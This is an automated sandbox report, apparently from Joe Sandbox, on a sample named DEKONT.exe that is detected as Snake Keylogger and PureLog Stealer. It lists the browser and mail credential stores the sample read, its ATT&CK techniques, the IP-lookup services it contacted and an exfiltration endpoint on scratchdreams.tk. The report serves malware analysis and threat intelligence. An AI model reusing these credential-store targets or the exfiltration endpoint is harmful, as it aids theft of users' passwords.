Source: Yara match	File source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DEKONT.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\DEKONT.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\DEKONT.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.DEKONT.exe.4409970.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4409970.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5b20000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1375703382.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.DEKONT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5056a70.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DEKONT.exe.4f92230.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DEKONT.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DEKONT.exe	45%	ReversingLabs	Win32.Ransomware.Loki
DEKONT.exe	47%	Virustotal		Browse
DEKONT.exe	100%	Avira	HEUR/AGEN.1309979
DEKONT.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	2%	Virustotal	Browse
scratchdreams.tk	17%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://tempuri.org/DataSet1.xsd	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/154.16.105.36$	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/154.16.105.36(	0%	Avira URL Cloud	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/154.16.105.36	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk	16%	Virustotal		Browse
http://tempuri.org/DataSet1.xsd	2%	Virustotal		Browse
http://scratchdreams.tk	17%	Virustotal		Browse
https://scratchdreams.tk/_send_.php?TS	14%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	2%, Virustotal, Browse	unknown
scratchdreams.tk	104.21.27.85	true	false	17%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.6.168	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/154.16.105.36	false	Avira URL Cloud: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/154.16.105.36$	DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/DataSet1.xsd	DEKONT.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://scratchdreams.tk	DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	DEKONT.exe, 00000003.00000002.3822157482.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/154.16.105.36(	DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	DEKONT.exe, 00000003.00000002.3822157482.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003163000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000308D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003155000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003191000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003182000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003147000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000312C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DEKONT.exe, 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://scratchdreams.tk	DEKONT.exe, 00000003.00000002.3822157482.000000000319F000.00000004.00000800.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	DEKONT.exe, 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003099000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430860
Start date and time:	2024-04-24 10:11:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DEKONT.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 152 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:12:01	API Interceptor	11155798x Sleep call for process: DEKONT.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.67.152	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
193.122.6.168	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	0FvHGK2cyk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	UbMsBrTi5s.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
104.21.27.85	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	order.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	0FvHGK2cyk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.6.168
	M0uVrW4HJb.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	sample1.exe	Get hash	malicious	SeclesBot, TrojanRansom	Browse	132.226.247.73
	UbMsBrTi5s.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
scratchdreams.tk	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
reallyfreegeoip.org	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	192.29.11.142
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	193.122.130.38
	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	pGTQLD9ukH.elf	Get hash	malicious	Mirai	Browse	193.122.239.120
	pJNcZyhUh8.elf	Get hash	malicious	Mirai	Browse	193.122.239.110
	g2PqnVy6cQ.elf	Get hash	malicious	Mirai, Okiru	Browse	144.25.156.10
	b3astmode.x86.elf	Get hash	malicious	Unknown	Browse	168.138.235.164
	order.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	KSRRrEMt1w.elf	Get hash	malicious	Mirai	Browse	147.154.227.149
CLOUDFLARENETUS	https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php	Get hash	malicious	Unknown	Browse	104.21.91.122
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	https://220420241.blob.core.windows.net/web/index.html?id=999	Get hash	malicious	Unknown	Browse	1.1.1.1
	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.139.220
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	https://tibusiness.cl/css/causarol.rar	Get hash	malicious	Unknown	Browse	1.1.1.1
CLOUDFLARENETUS	https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.php	Get hash	malicious	Unknown	Browse	104.21.91.122
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	172.67.139.220
	https://220420241.blob.core.windows.net/web/index.html?id=999	Get hash	malicious	Unknown	Browse	1.1.1.1
	responsibilityleadpro.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	8jvTeVxooN.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	172.67.139.220
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	https://tibusiness.cl/css/causarol.rar	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	SecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.67.152
	https://docs.google.com/presentation/d/e/2PACX-1vTSXaY7ubI0TsmtDZGhnfi1zhnSxguMyu2LhG-ysNsdY7OPzg5AMGaTqcxwu9_JVEAMwiEcyOI9wHoz/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	104.21.67.152
	hRsK5gPX8l.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
	T1SEuO2fxi.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
	T1SEuO2fxi.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
	SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe	Get hash	malicious	PureLog Stealer	Browse	104.21.67.152
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
	mdWXrbOxsY.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
	M0uVrW4HJb.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	Umulighed.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.27.85
	load_startup.txt.ps1	Get hash	malicious	Unknown	Browse	104.21.27.85
	M_F+niestandardowy stempel.xlsx.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
